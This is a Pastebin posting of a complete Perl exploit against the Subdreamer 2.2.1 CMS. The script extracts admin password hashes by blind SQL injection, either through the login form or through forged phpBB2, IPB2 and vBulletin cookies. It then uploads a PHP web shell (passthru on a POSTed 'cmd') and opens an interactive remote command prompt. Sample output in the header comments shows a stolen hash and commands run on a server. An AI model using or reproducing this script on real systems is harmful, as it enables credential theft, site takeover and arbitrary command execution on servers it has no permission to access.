Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ==========================================================
- Subdreamer 2.2.1 SQL Injection / Command Execution Exploit
- ==========================================================
- #!/usr/bin/perl
- ## Subdreamer 2.2.1 command exec exploit
- ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
- ## supported targets:
- ## ~ without forum integration
- ## ~ with phpBB2 integration
- ## ~ with ipb2 integration
- ## ~ with vbulletin2 integration
- ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
- ## (c)oded by 1dt.w0lf - 19/09/2005
- ## RST/GHC
- ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
- ## work:
- ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
- ## r57subdreamer.pl -p http://subdreamer.com.ru/ -u 2 -t 1
- ## ------------------------------------------------------------------
- ## [~] PATH : http://subdreamer.com.ru/
- ## [~] USER : 2
- ## [~] TARGET : 1 - PhpBB2
- ## [1] STEP 1 : TRY GET USER PASSWORD
- ## [~] SEARCHING PASSWORD ... [ DONE ]
- ## -----------------------------------------------------------
- ## USER_ID: 2
- ## PASS: 26310e438a5a1fb8622738f1e5d34f8b
- ## -----------------------------------------------------------
- ## [2] STEP 2 : CHECK WHAT USER HAVE ACCESS TO ADMIN ZONE
- ## [+] DONE! THIS USER HAVE ACCESS!
- ## [3] STEP 3 : UPLOAD FILE
- ## [+] DONE! FILE "img.php" UPLOADED
- ## [+] WELL DONE! NOW YOU CAN EXECUTE COMMANDS! =)
- ## SUBDREAMER# id; uname -a; ls -la;
- ## ----------------------------------------------------------------
- ## uid=1003(apache) gid=1003(apache) groups=1003(apache)
- ## FreeBSD customer-3314.cit-network.net 5.3-RELEASE FreeBSD 5.3-RELEASE #0:
- ## Fri Nov 5 04:19:18 UTC 2004 root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
- ## total 24
- ## drwxrwxrwx 5 enshteyn apache 512 Sep 19 23:04 .
- ## drwxr-x--- 10 enshteyn apache 512 Sep 17 21:03 ..
- ## drwxr-xr-x 2 enshteyn apache 512 Sep 10 14:09 Image
- ## -rw-r--r-- 1 apache apache 48 Sep 19 23:04 img.php
- ## drwxrwxrwx 2 enshteyn apache 512 Sep 10 14:09 logos
- ## drwxrwxrwx 2 enshteyn apache 512 Sep 10 14:09 smilies
- ## ----------------------------------------------------------------
- ## SUBDREAMER# exit
- ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
- ## config
- ## ------
- ##
- ## images folder
- $img_folder = 'images';
- ## or try
- ##$img_folder = 'images/logos';
- ##
- ## end config
- use LWP::UserAgent;
- use HTTP::Cookies;
- use Getopt::Std;
- getopts('u:p:h:t:');
- $path = $opt_p;
- $user = $opt_u;
- $hash = $opt_h;
- $target = $opt_t || 0;
- $s_num = 1;
- $|++;
- $n = 0;
- @targets = (
- #['target name','colimn1 in database','colimn2 in database','cookie name 1','cookie name 2']
- ['Subdreamer without forum','userid','password','sduserid','sdpassword'],
- ['PhpBB2','user_id','user_password','phpbb2mysql_data',''],
- ['IPB2','id','member_login_key','member_id','pass_hash'],
- ['PhpBB2 cookie injection','','','phpbb2mysql_data',''],
- ['IPB2 cookie injection','id','','member_id','pass_hash'],
- ['Vbulletin cookie injection','userid','','bbuserid','bbpassword'],
- );
- if (!$path || !$user || $target<0 || $target>5) { &usage; }
- &head();
- if($path=~/[^\/]$/) { $path .= '/'; }
- print "[~] PATH : $path\r\n";
- print "[~] USER : $user\r\n";
- print "[~] TARGET : $target - $targets[$target][0]\r\n";
- if($target==1||$target==2||$target==0) {
- print "[1] STEP 1 : TRY GET USER PASSWORD\r\n";
- if(!$hash){
- print "[~] SEARCHING PASSWORD ... [|]";
- FIND: while(1)
- {
- if(&found(47,58)==0) { &found(96,103); }
- $char = $i;
- if ($char=="0")
- {
- if(length($allchar) > 0){
- print qq{\b\b DONE ]
- -----------------------------------------------------------
- USER_ID: $user
- PASS: $allchar
- -----------------------------------------------------------
- };
- last FIND;
- }
- else
- {
- print "\b\b FAILED ]";
- }
- exit();
- }
- else
- {
- $allchar .= chr($char);
- }
- $s_num++;
- }
- }
- else
- {
- print "[~] SKIP. HASH EXISTS\r\n";
- $allchar = $hash;
- }
- }
- print "[2] STEP 2 : CHECK WHAT USER HAVE ACCESS TO ADMIN ZONE\r\n";
- if(&check_admin_rights())
- {
- print "[+] DONE! THIS USER HAVE ACCESS!\r\n";
- }
- else
- {
- print "[-] DAMN! THIS USER NOT ADMIN =(\r\n";
- exit();
- }
- print "[3] STEP 3 : UPLOAD FILE\r\n";
- if(&upload_file())
- {
- print "[+] DONE! FILE \"img.php\" UPLOADED\r\n";
- }
- else
- {
- print "[-] DAMN! UPLOAD ERROR =(\r\n";
- exit();
- }
- print "[+] WELL DONE! NOW YOU CAN EXECUTE COMMANDS! =)\r\n";
- while ()
- {
- print "SUBDREAMER# ";
- while(<STDIN>)
- {
- $cmd=$_;
- chomp($cmd);
- exit() if ($cmd eq 'exit');
- last;
- }
- &run($cmd);
- }
- sub found($$)
- {
- my $fmin = $_[0];
- my $fmax = $_[1];
- if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
- $r = int($fmax - ($fmax-$fmin)/2);
- $check = " BETWEEN $r AND $fmax";
- if ( &check($check) ) { &found($r,$fmax); }
- else { &found($fmin,$r); }
- }
- sub crack($$)
- {
- my $cmin = $_[0];
- my $cmax = $_[1];
- $i = $cmin;
- while ($i<$cmax)
- {
- $crcheck = "=$i";
- if ( &check($crcheck) ) { return $i; }
- $i++;
- }
- $i = 0;
- return $i;
- }
- sub check($)
- {
- $n++;
- status();
- $ccheck = $_[0];
- $username = "no_such_user' OR (".$targets[$target][1]."=".$user." AND (ascii(substring(".$targets[$target][2].",".$s_num.",1))".$ccheck.")) /*";
- $xpl = LWP::UserAgent->new() or die;
- $res = $xpl->post($path.'index.php',
- {
- "loginusername" => $username,
- "loginpassword" => "nap0Jlb_Haxep",
- "login" => "login",
- "Submit now" => "Login"
- }
- );
- @results = $res->content;
- foreach $result(@results)
- {
- if ($result =~ /(Database error)|(Invalid SQL)/i)
- {
- print "\r\n[-] SQL SYNTAX ERROR! CHECK TARGET!\r\n";
- exit();
- }
- #print $result;
- # english pattern
- if ($result =~ /Wrong Password/) { return 1; }
- # russian pattern
- if ($result =~ /...... ......./) { return 1; }
- # russian pattern 2
- if ($result =~ /............ ....../) { return 1; }
- # russian pattern 3 ( KOI8-R tested on subdreamer.com.ru )
- if ($result =~ /...... ......./) { return 1; }
- }
- return 0;
- }
- sub status()
- {
- $status = $n % 5;
- if($status==0){ print "\b\b/]"; }
- if($status==1){ print "\b\b-]"; }
- if($status==2){ print "\b\b\\]"; }
- if($status==3){ print "\b\b|]"; }
- }
- sub check_admin_rights()
- {
- $xpl = LWP::UserAgent->new() or die;
- $cookie_jar = HTTP::Cookies->new( );
- $xpl->cookie_jar( $cookie_jar );
- ($host = $path) =~ s!http://([^/]*).*!$1!;
- if($target == 1)
- {
- # not default phpbb2 cookie, work for subdreamer.com.ru ... maybe default for subdreamer pro RU ???
- #$cookie_jar->set_cookie( "0",$targets[$target][3], 'autologinid='.$allchar.'|userid='.$user,"/",$host,,,,,);
- # default phpbb2 cookie
- $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22".$allchar."%22%3Bs%3A6%3A%22userid%22%3Bs%3A".length($user)."%3A%22".$user."%22%3B%7D","/",$host,,,,,);
- }
- elsif($target == 3)
- {
- # phpbb2 cookie with sql injection
- $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A3%3A%22666%22%3Bs%3A6%3A%22userid%22%3Bs%3A".(length($user)+4)."%3A%22".$user."%27+%2F%2A%22%3B%7D","/",$host,,,,,);
- }
- elsif($target == 4)
- {
- # ipb2 cookie with sql injection
- $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,);
- $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);
- }
- elsif($target == 5)
- {
- # Vbulletin cookie with sql injection
- $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,);
- $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);
- }
- else
- {
- # subdreamer || ipb2 cookies
- $cookie_jar->set_cookie( "0",$targets[$target][3], $user,"/",$host,,,,,);
- $cookie_jar->set_cookie( "1",$targets[$target][4], $allchar,"/",$host,,,,,);
- }
- $res = $xpl->get($path."admin/index.php");
- if($res->content =~ /loginpassword/) { return 0; }
- else { return 1; }
- }
- sub upload_file()
- {
- $xpl = LWP::UserAgent->new() or die;
- $cookie_jar = HTTP::Cookies->new( );
- $xpl->cookie_jar( $cookie_jar );
- ($host = $path) =~ s!http://([^/]*).*!$1!;
- if($target == 1)
- {
- # not default phpbb2 cookie, work for subdreamer.com.ru ... maybe default for subdreamer pro RU ???
- #$cookie_jar->set_cookie( "0",$targets[$target][3], 'autologinid='.$allchar.'|userid='.$user,"/",$host,,,,,);
- # default phpbb2 cookie
- $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22".$allchar."%22%3Bs%3A6%3A%22userid%22%3Bs%3A".length($user)."%3A%22".$user."%22%3B%7D","/",$host,,,,,);
- }
- elsif($target == 3)
- {
- # phpbb2 cookie with sql injection
- $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A3%3A%22666%22%3Bs%3A6%3A%22userid%22%3Bs%3A".(length($user)+4)."%3A%22".$user."%27+%2F%2A%22%3B%7D","/",$host,,,,,);
- }
- elsif($target == 4)
- {
- # ipb2 cookie with sql injection
- $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,);
- $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);
- }
- elsif($target == 5)
- {
- # Vbulletin cookie with sql injection
- $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,);
- $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);
- }
- else
- {
- # subdreamer || ipb2 cookies
- $cookie_jar->set_cookie( "0",$targets[$target][3], $user,"/",$host,,,,,);
- $cookie_jar->set_cookie( "1",$targets[$target][4], $allchar,"/",$host,,,,,);
- }
- $res = $xpl->post($path.'admin/imagemanager.php',Content_Type => 'form-data',
- Content => [
- 'action' => 'uploadimage',
- 'folderpath' => "../$img_folder/",
- 'MAX_FILE_SIZE' => '1000000',
- 'image' => [
- undef,
- 'img.php',
- Content_type => 'text/plain',
- Content => '<? if($_POST[cmd]) { passthru($_POST[cmd]); } ?>',
- ],
- 'submit' => 'Upload Image',
- ],
- );
- if($res->content =~ /Settings Updated/) { return 1; }
- if($res->content =~ /Uploading Errors/) { return 0; }
- else { return 1; }
- }
- sub run()
- {
- $xpl = LWP::UserAgent->new() or die;
- $res = $xpl->post($path.$img_folder.'/img.php',{'cmd'=>$cmd});
- print "----------------------------------------------------------------\r\n";
- print $res->content;
- print "----------------------------------------------------------------\r\n";
- }
- sub usage()
- {
- &head();
- print q(| |
- | - Usage: |
- | r57subdreamer.pl -p <path> -u <user_id> [-t <target>] [-h <hash>] |
- | <path> - Path to subdreamer folder |
- | <user_id> - User id for bruteforce |
- | <hash> - MD5 password hash for this user if you have it =\) |
- | - Available targets: |
- | - brute password: |
- | 0 - Subdreamer without forum integration ( default ) |
- | 1 - Subdreamer with PhpBB2 integration |
- | 2 - Subdreamer with IPB2 integration |
- | - cookie sql injection, dont need brute password: |
- | 3 - Subdreamer with PhpBB2 integration 2 |
- | 4 - Subdreamer with IPB2 integration 2 |
- | 5 - Subdreamer with Vbulletin integration |
- +--------------------------------------------------------------------+
- | e.g.: |
- | r57subdreamer.pl -p http://127.0.0.1/subdreamer/ -u 1 |
- | r57subdreamer.pl -p http://www.subdreamer.com.ru -u 2 -t 1 |
- +--------------------------------------------------------------------+
- );
- exit();
- }
- sub head()
- {
- print q(
- +--------------------------------------------------------------------+
- | Subdreamer version 2.2.1 sql injection + command execution exploit |
- | by 1dt.w0lf |
- | RST/GHC |
- +--------------------------------------------------------------------+
- );}
- # 0day.today [2016-04-19] #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement